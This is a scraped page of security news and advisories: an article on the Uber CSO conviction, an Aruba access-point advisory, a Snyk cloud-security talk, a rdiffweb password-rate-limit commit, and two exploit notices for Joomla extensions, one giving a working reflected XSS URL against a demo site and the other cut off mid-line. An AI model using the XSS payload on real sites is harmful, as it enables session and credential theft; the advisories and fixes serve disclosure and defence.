Talos is publishing a glimpse into the most prevalent threats we've observed between Sept. 30 and Oct. 7.

Threat Roundup for September 30 to October 7

Former Uber security chief Joe Sullivan’s conviction is a rare criminal consequence for an executive’s handling of a hack.

Uber's Former chief security officer, Joe Sullivan, was found guilty this week of actively hiding a data breach from the US Federal Trade Commission (FTC) and concealing a felony. The case has reverberated through the security and tech worlds because it is seemingly the first time that an individual executive has faced criminal prosecution for charges related to a data breach against the executive's company. As alarming as Sullivan's conviction may be to some, gauging the fallout for security executives is anything but straightforward.

Chief security officers are sometimes wryly referred to as “chief scapegoat officers” or “chief sacrificial officers,” because the practical challenges of securing massive organizations are so great. It is all but inevitable that companies will suffer hacks and breaches, and CSOs preside over the aftermath. Many now worry that Sullivan's conviction will make the already daunting role even less appealing to top talent. But the United States Department of Justice is positioning the case as an opportunity to set guardrails around what behavior is—and isn't—acceptable in the fraught balancing act of corporate breach response.

“This definitely will have a chilling effect,” says Anthony Vance, a professor and researcher at Virginia Tech who focuses on how individuals and organizations can improve cybersecurity practices. “Most people aren’t clear about the nuance that is involved here, but more generally, it does show that someone could be held accountable and convicted for a data breach, which has never happened. It’s possible even if this is an extreme case.”

Sullivan’s trouble goes back to November 2016, when Uber suffered a data breach that compromised personal information of more than 57 million users, including drivers and passengers. The rideshare giant didn't disclose the breach until November 2017, when its current chief executive officer, Dara Khosrowshahi, took over and fired Sullivan along with a company lawyer, Craig Clark. In 2018, Uber paid $148 million to settle with attorneys general across the United States for violating state data breach disclosure laws.

The delayed notification in itself isn't what brought Sullivan into the Justice Department's crosshairs, though. When Sullivan learned about the 2016 hack, he was already working with the FTC on its ongoing investigation into another, unrelated 2014 Uber data breach. Among other things, Sullivan gave a sworn deposition to the FTC about the incident and steps Uber had since taken to improve its digital security practices. 10 days after providing this testimony, he learned of the new data breach. The hackers attempted to extort the company by threatening to publish the data they had stolen if they didn't receive payment. 

Sullivan is now convicted of spearheading the effort to cover up this breach by paying the hackers $100,000 through the company's bug bounty program. As part of the deal, authorities say, he required the hackers to delete the stolen data and sign a nondisclosure agreement about the incident. These actions amounted to a failure to report a felony, according to the DOJ, and resulted in a “misprision of felony” charge. He was also charged in 2020 and convicted this week of obstruction of proceedings of the FTC for failing to amend his testimony to the agency about Uber's security conditions once he learned of the 2016 breach.

“This is a unique case because there was that ongoing FTC investigation,” says Shawn Tuma, a partner in the law firm Spencer Fane who specializes in cybersecurity and data privacy issues. “He had just given sworn testimony and was most certainly under a duty to further supplement and provide relevant information to the FTC. That’s how it works.”

Tuma, who frequently works with companies responding to data breaches, says that the more concerning conviction in terms of future precedent is the misprision of felony charge. While the prosecution was seemingly motivated primarily by Sullivan's failure to notify the FTC of the 2016 breach during the agency's investigation, the misprision charge could create a public perception that it is never legal or acceptable to pay ransomware actors or hackers attempting to extort payment to keep stolen data private.

“These situations are highly charged and CSOs are under immense pressure,” Vance says. “What Sullivan did seems to have succeeded at keeping the data from coming out, so in their minds, they succeeded at protecting user data. But would I personally have done that? I hope not.”

Sullivan told _The New York Times_ in a 2018 statement, “I was surprised and disappointed when those who wanted to portray Uber in a negative light quickly suggested this was a cover-up.”

The facts of the case are somewhat specific in the sense that Sullivan didn't simply lead Uber to pay the criminals. His plan also involved presenting the transaction as a bug bounty payout and getting the hackers—who pleaded guilty to perpetrating the breach in October 2019—to sign an NDA. While the FBI has been clear that it doesn't condone paying hackers off, US law enforcement has generally sent a message that what it values most is being notified and brought into the process of breach response. Even the Treasury Department has said that it can be more flexible and lenient about payments to sanctioned entities if victims notify the government and cooperate with law enforcement. In some cases, as with the 2021 Colonial Pipeline ransomware attack, officials working with victims have been able to trace payments and attempt to recoup the money. 

“This is the one that gives me the most concern, because paying a ransomware attacker could be viewed out in the public as criminal wrongdoing, and then over time that could become a sort of default standard,” Tuma says. “On the other hand, the FBI highly encourages people to report these incidents, and I’ve never had an adverse experience with working with them personally. There’s a difference between making that payment to the bad guys to buy their cooperation and saying, ‘We’re going to try to make it look like a bug bounty and have you sign an NDA that’s false.’ If you have a duty to supplement to the FTC, you could give them relevant information, comply with breach notification laws, and take your licks.”

Tuma and Vance both note, though, that the climate in the US for handling data extortion situations and working with law enforcement on ransomware investigations has evolved significantly since 2016. For executives tasked with protecting the reputation and viability of their company—in addition to defending users—the options for how to respond a few years ago were much murkier than they are now. And this may be exactly the point of the Justice Department's effort to prosecute Sullivan.

“Technology companies in the Northern District of California collect and store vast amounts of data from users. We expect those companies to protect that data and to alert customers and appropriate authorities when such data is stolen by hackers,” US attorney Stephanie Hinds said in a statement about the conviction on Wednesday. “Sullivan affirmatively worked to hide the data breach from the Federal Trade Commission and took steps to prevent the hackers from being caught. Where such conduct violates the federal law, it will be prosecuted.”

Sullivan has yet to be sentenced—another chapter in the saga that security executives will no doubt be watching extremely closely.

The Uber Data Breach Conviction Shows Security Execs What Not to Do

There are buffer overflow vulnerabilities in multiple underlying services that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba Networks AP management protocol) UDP port (8211). Successful exploitation of these vulnerabilities results in the ability to execute arbitrary code as a privileged user on the underlying operating system of Aruba InstantOS 6.4.x: 6.4.4.8-4.2.4.20 and below; Aruba InstantOS 6.5.x: 6.5.4.23 and below; Aruba InstantOS 8.6.x: 8.6.0.18 and below; Aruba InstantOS 8.7.x: 8.7.1.9 and below; Aruba InstantOS 8.10.x: 8.10.0.1 and below; ArubaOS 10.3.x: 10.3.1.0 and below; Aruba has released upgrades for Aruba InnstantOS that address these security vulnerabilities.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Aruba Product Security Advisory =============================== Advisory ID: ARUBA-PSA-2022-014 CVE: CVE-2002-20001, CVE-2022-37885, CVE-2022-37886, CVE-2022-37887, CVE-2022-37888, CVE-2022-37889, CVE-2022-37890, CVE-2022-37891, CVE-2022-37892, CVE-2022-37893, CVE-2022-37894, CVE-2022-37895, CVE-2022-37896 Publication Date: 2022-Sep-27 Status: Confirmed Severity: Critical Revision: 1 Title ===== Aruba Access Points Multiple Vulnerabilities Overview ======== Aruba has released patches for Aruba access points running InstantOS and ArubaOS 10 that address multiple security vulnerabilities. Affected Products ================= Aruba Access Points running InstantOS and ArubaOS 10 Affected versions: - Aruba InstantOS 6.4.x: 6.4.4.8-4.2.4.20 and below - Aruba InstantOS 6.5.x: 6.5.4.23 and below - Aruba InstantOS 8.6.x: 8.6.0.18 and below - Aruba InstantOS 8.7.x: 8.7.1.9 and below - Aruba InstantOS 8.10.x: 8.10.0.1 and below - ArubaOS 10.3.x: 10.3.1.0 and below Branches that are end of life should be considered to be affected. Impacted customers should plan to upgrade to a supported branch. Supported branches as of the release of this advisory are: - InstantOS 6.4.x-4.2.x - InstantOS 6.5.4.x - InstantOS 8.6.x - InstantOS 8.7.x - InstantOS 8.10.x - ArubaOS 10.3.1.x Unaffected Products =================== Aruba Mobility Conductor, Aruba Mobility Controllers, Access-Points when managed by Mobility Controllers and Aruba SD-WAN Gateways are not affected by these vulnerabilities. Aruba InstantOn is also not affected by these vulnerabilities. Details ======= Buffer Overflow Vulnerabilities in the PAPI protocol (CVE-2022-37885, CVE-2022-37886, CVE-2022-37887, CVE-2022-37888, CVE-2022-37889) -------------------------------------------------------------- There are buffer overflow vulnerabilities in multiple underlying services that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba Networks AP management protocol) UDP port (8211). Successful exploitation of these vulnerabilities results in the ability to execute arbitrary code as a privileged user on the underlying operating system. Internal References: ATLWL-253, ATLWL-254, ATLWL-299, ATLWL-300, ATLWL-302 Severity: Critical CVSSv3 Overall Score: 9.8 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Discovery: These vulnerabilities were discovered and reported by Erik de Jong (bugcrowd.com/erikdejong) via Aruba's bug bounty program. Workaround: Enabling CPSec via the cluster-security command will prevent the vulnerabilities from being exploited in Aruba InstantOS devices running 8.x or 6.x code. For ArubaOS 10 devices this is not an option and instead access to port UDP/8211 must be blocked from all untrusted networks. Please contact TAC for configuration assistance. Unauthenticated Buffer Overflow in Web Management Interface (CVE-2022-37890, CVE-2022-37891) --------------------------------------------------------------------- Unauthenticated buffer overflow vulnerabilities exist within the Aruba InstantOS and ArubaOS 10 web management interface. Successful exploitation results in the execution of arbitrary commands on the underlying operating system. Internal References: ATLWL-102, ATLWL-268 Severity: Critical CVSSv3 Overall Score: 9.8 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Discovery: These vulnerabilities were discovered and reported by Nikita Abramov of Positive Technologies and Nicholas Starke of Aruba Threat Labs Workaround: See general workaround after the resolution section at the end of this document Unauthenticated Stored Cross-Site Scripting (CVE-2022-37892) --------------------------------------------------------------------- A vulnerability in the Aruba InstantOS and ArubaOS 10 web management interface could allow an unauthenticated remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface. A successful exploit could allow an attacker to execute arbitrary script code in a victim’s browser in the context of the affected interface. Internal Reference: ATLWL-168 Severity: High CVSSv3 Overall Score: 8.1 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N Discovery: This vulnerability was discovered and reported by Daniel Jensen (@dozernz) via Aruba's Bug Bounty Program. Workaround: See general workaround after the resolution section at the end of this document Diffie-Hellman Key Agreement Protocol Vulnerability (CVE-2002-20001) --------------------------------------------------------------------- The Diffie-Hellman Key Agreement Protocol allows remote attackers (from the client side) to send arbitrary numbers that are actually not public keys and trigger expensive server-side DHE modular-exponentiation calculations, aka a D(HE)ater attack. Successful exploitation of this vulnerability can lead to a denial of service on the affected access point. Internal Reference: ATLWL-266 Severity: High CVSSv3.1 Overall Score: 7.5 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Discovery: This vulnerability was discovered and reported by Jean-francois Raymond and Anton Stiglic. Workaround: See general workaround after the resolution section at the end of this document Please see the following link for more details: https://www.researchgate.net/publication/2401745\_Security\_Issues\_in\_the\_Diffie-Hellman\_Key\_Agreement\_Protocol Authenticated Remote Command Execution in Aruba InstantOS or ArubaOS 10 Command Line Interface (CVE-2022-37893) --------------------------------------------------------------------- An authenticated command injection vulnerability exists in the Aruba InstantOS and ArubaOS 10 command line interface. Successful exploitation of this vulnerability results in the ability to execute arbitrary commands as a privileged user on the underlying operating system. Internal Reference: ATLWL-97 Severity: High CVSSv3 Overall Score: 7.2 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H Discovery: This vulnerability was discovered and reported by Erik de Jong (bugcrowd.com/erikdejong) via Aruba's bug bounty program. Workaround: See general workaround after the resolution section at the end of this document Unauthenticated Denial of Service (DoS) via faulty processing of SSID strings (CVE-2022-37894) --------------------------------------------------------------------- An unauthenticated Denial of Service (DoS) vulnerability exists in the handling of certain SSID strings by Aruba InstantOS and ArubaOS 10. Successful exploitation of this vulnerability results in the ability to interrupt the normal operation of the affected AP. Internal Reference: ATLWL-242 Severity: Medium CVSSv3 Overall Score: 6.5 CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H Discovery: This vulnerability was discovered and reported by Bill Bushong of Gyver Technologies. Workaround: None Authenticated Denial of Service (DoS) in Aruba InstantOS or ArubaOS 10 Web Management Interface (CVE-2022-37895) --------------------------------------------------------------------- An authenticated Denial of Service (DoS) vulnerability exists in the Aruba InstantOS and ArubaOS 10 web management interface. Successful exploitation of this vulnerability results in the ability to interrupt the normal operation of the affected AP. Internal Reference: ATLWL-248 Severity: Medium CVSSv3 Overall Score: 4.9 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H Discovery: This vulnerability was discovered and reported by swings (bugcrowd.com/swings) via Aruba's bug bounty program. Workaround: See general workaround after the resolution section at the end of this document Reflected Cross-Site Scripting (CVE-2022-37896) --------------------------------------------------------------------- A vulnerability in the Aruba InstantOS and ArubaOS 10 web management interface could allow a remote attacker to conduct a reflected cross-site scripting (XSS) attack against a user of the interface. A successful exploit could allow an attacker to execute arbitrary script code in a victim’s browser in the context of the affected interface. Internal Reference: ATLWL-234 Severity: Medium CVSSv3 Overall Score: 4.8 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N Discovery: This vulnerability was discovered and reported by Daniel Jensen (@dozernz) via Aruba's bug bounty program. Workaround: See general workaround after the resolution section at the end of this document Resolution ========== In order to address the vulnerabilities described above for the affected release branches, it is recommended to upgrade the software to the following versions: - Aruba InstantOS 6.4.x: 6.4.4.8-4.2.4.21 and above - Aruba InstantOS 6.5.x: 6.5.4.24 and above - Aruba InstantOS 8.6.x: 8.6.0.19 and above - Aruba InstantOS 8.7.x: 8.7.1.10 and above - Aruba InstantOS 8.10.x: 8.10.0.2 and above - ArubaOS 10.3.x: 10.3.1.1 and above Aruba does not evaluate or patch Aruba InstantOS and ArubaOS 10 software branches that have reached their End of Support (EoS) milestone. For more information about Aruba's End of Support policy visit: https://www.arubanetworks.com/support-services/end-of-life/ Workaround ========== To minimize the likelihood of an attacker exploiting these vulnerabilities, Aruba recommends that the CLI and web-based management interfaces be restricted to a dedicated layer 2 segment/VLAN and/or controlled by firewall policies at layer 3 and above. Vulnerability specific workarounds are listed per vulnerability above. Contact Aruba TAC for any configuration assistance. Exploitation and Public Discussion ================================== Aruba is not aware of any public discussion or exploit code that target these specific vulnerabilities as of the publication of this advisory. Revision History ================ Revision 1 / 2022-Sep-27 / Initial release Aruba SIRT Security Procedures ============================== Complete information on reporting security vulnerabilities in Aruba Networks products and obtaining assistance with security incidents is available at: https://www.arubanetworks.com/support-services/security-bulletins/ For reporting \*NEW\* Aruba Networks security issues, email can be sent to aruba-sirt(at)hpe.com. For sensitive information we encourage the use of PGP encryption. Our public keys can be found at: https://www.arubanetworks.com/support-services/security-bulletins/ (c) Copyright 2022 by Aruba, a Hewlett Packard Enterprise company. This advisory may be redistributed freely after the release date given at the top of the text, provided that the redistributed copies are complete and unmodified, including all data and version information. -----BEGIN PGP SIGNATURE----- iQFLBAEBCAA1FiEEMd5pP5EnbG7Y0fo5mP4JykWFhtkFAmMky2QXHHNpcnRAYXJ1 YmFuZXR3b3Jrcy5jb20ACgkQmP4JykWFhtn62wgApoJQx1oap7UM+qa1yu6+U/8+ U/2SqTWw+ZS6pp7rgS83yYdnvIv+PZHg5Ob+b7Ym9W9/w9Nv60ZEv3yxg/c4W8oF 03i5q+syGOVtdRGqTJ/cjYmiGpFZVNOiqIqxm1fHXLZK8pSshNud9mN/GFY8IQS5 1zx5oRIXxK6OxOmENG76C1MHZQyuSZDuvAgesHRe6rlIMCWPw+Xd5EcqY1F1O+hv jgibHDVumayMyYfusozheeXJhggMq1smxwPza3J7ngirJU3cnWKaIOagCBIg0FLA wz03N4WtgnrAlM/SjK0WzZK+5Mnr7GpOfOI1Lwl04eGeXDhZ9gIZ2d58OZwkYQ== =UQP+ -----END PGP SIGNATURE-----

CVE-2022-37885

Research suggests that automation can cut down on cloud control plane compromises

Stephen Pritchard 07 October 2022 at 15:24 UTC  
Updated: 07 October 2022 at 15:26 UTC

Research suggests that automation can cut down on cloud control plane compromises

So-called ‘cloud native’ IT architectures are creating new threats for organizations, just as they look to update their technology infrastructure, security researchers have warned.

Over half of developers and security professionals expect the risks to their organizations to increase over the next year, according to research from developer security tools vendor Snyk. The drivers include cloud-native threats and, especially, control plane compromises.

Other potential problems include misconfigured cloud resources, as well as compromised credentials.

DON’T MISS CI/CD servers readily breached by abusing SCM webhooks, researchers find

Speaking at the recent International Cyber Expo in London, Ashish Rajan, principal cloud security advocate at Snyk, explained that security breaches are no longer only about data. Increasingly, criminal groups are also looking to steal or expose credentials, including cloud infrastructure credentials.

Rajan cited the recent breach at ride-hailing company Uber, which used social engineering as part of an attack that ultimately succeeded in gaining access to the company’s credentials for Amazon Web Services and Google Workspace.

“It’s not just a breach, a release of records, they also shared the AWS and Google Cloud credentials on the internet as well,” he said. “We are actually talking about data breaches creeping into our cloud environment or even broader production environments as well.”

**Credentials targeted**

Attackers are searching for credentials for cloud services by searching for ‘open S3 buckets’, blob storage or other open storage sites, as well as GitHub repositories, SSH \[Secure Shell\] and SSL vulnerabilities, and even posts by developers on sites such as Stack Overflow. “People are finding easier targets,” Rajan said.

This is forcing developers to pay more attention to both application security and cloud security, the speaker argued. Although organizations and their developers increasingly understand the need for application security, cloud security is too often treated separately rather than as part of the same problem, he asserted.

“In my previous company, we had a product security team and we had cloud people. But they weren’t on the same team. It didn't make sense. We were still protecting this one application,” said Rajan.

Developers often rely too heavily on the cloud provider’s security measures, says Snyk’s Ashish Rajan

**Cloudy with a chance of breaches**

And the situation is made more difficult still by the ‘shared responsibility’ model of cloud security. Too often, contended Rajan, developers and their managers rely on the cloud provider’s security measures, rather than ensuring that their infrastructure and code is secure.

According to Snyk’s 2022 State of Cloud Security Report, 80% of organizations experienced a “serious cloud sec incident” during the past year. Of those, 33% suffered a cloud data breach, and 26% a cloud data leak. A further 27% detected an intrusion into their environment.

Catch up on the latest DevSecOps-related news and analysis

The research also found that companies that use the cloud to host applications that had migrated from a data center were the most likely to report serious cloud security incidents: 89% did so during the past year.

That was higher than the total for organizations using the cloud to build and run in-house applications (73%) or those hosting third-party applications (78%).

**Infrastructure as code**

To counter this, Rajan suggests that developers should follow five fundamentals of cloud security. These are knowing the operating environment, focusing on prevention and secure design, empowering developers, using policy as code to align with security requirements and automate compliance, and ensuring security teams are “measuring what matters”.

To adhere to these fundamentals, organizations should be looking to ’shift left’ and build in security checks earlier in a project’s timeline. Firms should map out a cloud secure development lifecycle, using infrastructure as code (IaC) tools and CI/CD pipelines. And organizations can take this a step further by defining security policies within IaC.

This, Rajan said, removes, or at least reduces, one of the most common causes of cloud security failures: human error.

“What's the policy look like? Can I define the policy as IaC? That's where a lot of people have found that you can reduce credentials being leaked or over-privilege, or misconfiguration of resources, as well as having identity not in control,” he said. Policy as code allows organizations to apply their security rules, whether they use a single cloud platform, or two or even three, added Rajan.

RELATED Rancher stored sensitive values in plaintext, exposed Kubernetes clusters to takeover

Policy-as-code approach counters ‘cloud native’ security risks

Joomla Vik Booking extension version 1.15.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : e4j Extensions for Joomla - extensionsforjoomla.com                        ││  Software : Joomla Vik Booking 1.15.0                                                  ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.php/en/bookingGET parameter 'categories' is vulnerable to XSShttps://extensionsforjoomla.com/livedemo/vikbooking/index.php/en/booking?option=com_vikbooking&task=showprc&roomsnum=1&roomopt%5B%5D=9&adults%5B%5D=2&children%5B%5D=1&days=1&checkin=1665057600&checkout=1665136800&category_id=&categories=rnrtm%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ew3vus&Itemid=103[-] Done

Joomla Vik Booking 1.15.0 Cross Site Scripting

Allocation of Resources Without Limits or Throttling in GitHub repository ikus060/rdiffweb prior to 2.5.0a4.

  

@@ -132,6 +132,7 @@ This next release focus on two-factor-authentication as a measure to increase se

\* Generate a new session on login and 2FA #220

\* Enforce permission on /etc/rdiffweb configuration folder

\* Enforce validation on fullname, username and email

\* Limit incorrect attempts to change the user's password to prevent brute force attacks #225 \[CVE-2022-3273\](https://nvd.nist.gov/vuln/detail/CVE-2022-3273)

  

Breaking changes:

  

@@ -69,7 +69,7 @@ def flash(message, level='info'):

assert level in \['info', 'error', 'warning', 'success'\]

if 'flash' not in cherrypy.session: \# @UndefinedVariable

cherrypy.session\['flash'\] \= \[\] \# @UndefinedVariable

flash\_message \= FlashMessage(message, level)

flash\_message \= FlashMessage(str(message), level)

cherrypy.session\['flash'\].append(flash\_message)

  

  

@@ -159,7 +159,7 @@ def validate\_mfa(self, field):

def populate\_obj(self, userobj):

\# Save password if defined

if self.password.data:

userobj.set\_password(self.password.data, old\_password\=None)

userobj.set\_password(self.password.data)

userobj.role \= self.role.data

userobj.fullname \= self.fullname.data or ''

userobj.email \= self.email.data or ''

@@ -29,6 +29,10 @@

from rdiffweb.core.model import UserObject

from rdiffweb.tools.i18n import gettext\_lazy as \_

  

\# Maximum number of password change attempt before logout

CHANGE\_PASSWORD\_MAX\_ATTEMPT \= 5

CHANGE\_PASSWORD\_ATTEMPTS \= 'change\_password\_attempts'

  

  

class UserProfileForm(CherryForm):

action \= HiddenField(default\='set\_profile\_info')

@@ -85,11 +89,30 @@ def is\_submitted(self):

return super().is\_submitted() and self.action.data \== 'set\_password'

  

def populate\_obj(self, user):

try:

user.set\_password(self.new.data, old\_password\=self.current.data)

flash(\_("Password updated successfully."), level\='success')

except ValueError as e:

flash(str(e), level\='warning')

\# Check if current password is "valid" if Not, rate limit the

\# number of attempts and logout user after too many invalid attempts.

if not user.validate\_password(self.current.data):

cherrypy.session\[CHANGE\_PASSWORD\_ATTEMPTS\] \= cherrypy.session.get(CHANGE\_PASSWORD\_ATTEMPTS, 0) + 1

attempts \= cherrypy.session\[CHANGE\_PASSWORD\_ATTEMPTS\]

if attempts \>= CHANGE\_PASSWORD\_MAX\_ATTEMPT:

cherrypy.session.clear()

cherrypy.session.regenerate()

flash(

\_("You were logged out because you entered the wrong password too many times."),

level\='warning',

)

raise cherrypy.HTTPRedirect('/login/')

flash(\_("Wrong current password."), level\='warning')

else:

\# Clear number of attempts

if CHANGE\_PASSWORD\_ATTEMPTS in cherrypy.session:

del cherrypy.session\[CHANGE\_PASSWORD\_ATTEMPTS\]

\# If Valid, update password

try:

user.set\_password(self.new.data)

flash(\_("Password updated successfully."), level\='success')

except ValueError as e:

flash(str(e), level\='warning')

  

  

class RefreshForm(CherryForm):

@@ -182,7 +182,7 @@ def test\_change\_password\_with\_wrong\_confirmation(self):

  

def test\_change\_password\_with\_wrong\_password(self):

self.\_set\_password("oups", "pr3j5Dwi", "pr3j5Dwi")

self.assertInBody("Wrong password")

self.assertInBody("Wrong current password")

  

def test\_change\_password\_with\_too\_short(self):

self.\_set\_password(self.PASSWORD, "short", "short")

@@ -193,6 +193,21 @@ def test\_change\_password\_with\_too\_long(self):

self.\_set\_password(self.PASSWORD, new\_password, new\_password)

self.assertInBody("Password must have between 8 and 128 characters.")

  

def test\_change\_password\_too\_many\_attemps(self):

\# When udating user's password with wrong current password 5 times

for \_i in range(1, 5):

self.\_set\_password('wrong', "pr3j5Dwi", "pr3j5Dwi")

self.assertStatus(200)

self.assertInBody("Wrong current password.")

\# Then user session is cleared and user is redirect to login page

self.\_set\_password('wrong', "pr3j5Dwi", "pr3j5Dwi")

self.assertStatus(303)

self.assertHeaderItemValue('Location', self.baseurl + '/login/')

\# Then a warning message is displayed on login page

self.getPage('/login/')

self.assertStatus(200)

self.assertInBody('You were logged out because you entered the wrong password too many times.')

  

def test\_change\_password\_method\_get(self):

\# Given an authenticated user

\# Trying to update password with GET method

@@ -21,7 +21,6 @@

from cherrypy.process.plugins import SimplePlugin

  

from rdiffweb.core.model import UserObject

from rdiffweb.core.passwd import check\_password

  

logger \= logging.getLogger(\_\_name\_\_)

  

@@ -52,7 +51,7 @@ def authenticate(self, username, password):

Only verify the user's credentials using the database store.

"""

user \= UserObject.query.filter\_by(username\=username).first()

if user and check\_password(password, user.hash\_password):

if user and user.validate\_password(password):

return username, {}

return False

  

@@ -344,13 +344,12 @@ def is\_ldap(cls):

def is\_maintainer(self):

return self.role <= self.MAINTAINER\_ROLE

  

def set\_password(self, password, old\_password\=None):

def set\_password(self, password):

"""

Change the user's password. Raise a ValueError if the username or

the password are invalid.

"""

assert isinstance(password, str)

assert old\_password is None or isinstance(old\_password, str)

if not password:

raise ValueError("password can't be empty")

cfg \= cherrypy.tree.apps\[''\].cfg

@@ -359,9 +358,6 @@ def set\_password(self, password, old\_password=None):

if self.username \== cfg.admin\_user and cfg.admin\_password:

raise ValueError(\_("can't update admin-password defined in configuration file"))

  

if old\_password and not check\_password(old\_password, self.hash\_password):

raise ValueError(\_("Wrong password"))

  

\# Check password length

if cfg.password\_min\_length \> len(password) or len(password) \> cfg.password\_max\_length:

raise ValueError(

@@ -448,6 +444,9 @@ def validate\_access\_token(self, token):

return True

return False

  

def validate\_password(self, password):

return check\_password(password, self.hash\_password)

  

  

@event.listens\_for(UserObject.hash\_password, "set")

def hash\_password\_set(target, value, oldvalue, initiator):

@@ -200,28 +200,6 @@ def test\_set\_password\_update(self):

\# Check if listener called

self.listener.user\_password\_changed.assert\_called\_once\_with(userobj)

  

def test\_set\_password\_with\_old\_password(self):

\# Given a user in drabase with a password

userobj \= UserObject.add\_user('john', 'password')

self.listener.user\_password\_changed.reset\_mock()

\# When updating the user's password with old\_password

userobj.set\_password('new\_password', old\_password\='password')

\# Then password is SSHA

self.assertTrue(check\_password('new\_password', userobj.hash\_password))

\# Check if listener called

self.listener.user\_password\_changed.assert\_called\_once\_with(userobj)

  

def test\_set\_password\_with\_invalid\_old\_password(self):

\# Given a user in drabase with a password

userobj \= UserObject.add\_user('foo', 'password')

self.listener.user\_password\_changed.reset\_mock()

\# When updating the user's password with wrong old\_password

\# Then an exception is raised

with self.assertRaises(ValueError):

userobj.set\_password('new\_password', old\_password\='invalid')

\# Check if listener called

self.listener.user\_password\_changed.assert\_not\_called()

  

def test\_delete\_user(self):

\# Given an existing user in database

userobj \= UserObject.add\_user('vicky')

**0 comments on commit b5e3bb0**

Please sign in to comment.

CVE-2022-3273: Limit incorrect attempts to change the user's password to prevent bru… · ikus060/rdiffweb@b5e3bb0

Joomla KSAdvertiser extension version 2.5.37 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : Heiner Klostermann - kiss-software.de                                      ││  Software : Joomla KSAdvertiser 2.5.37                                                 ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpGET parameter 'fSpS' is vulnerable to 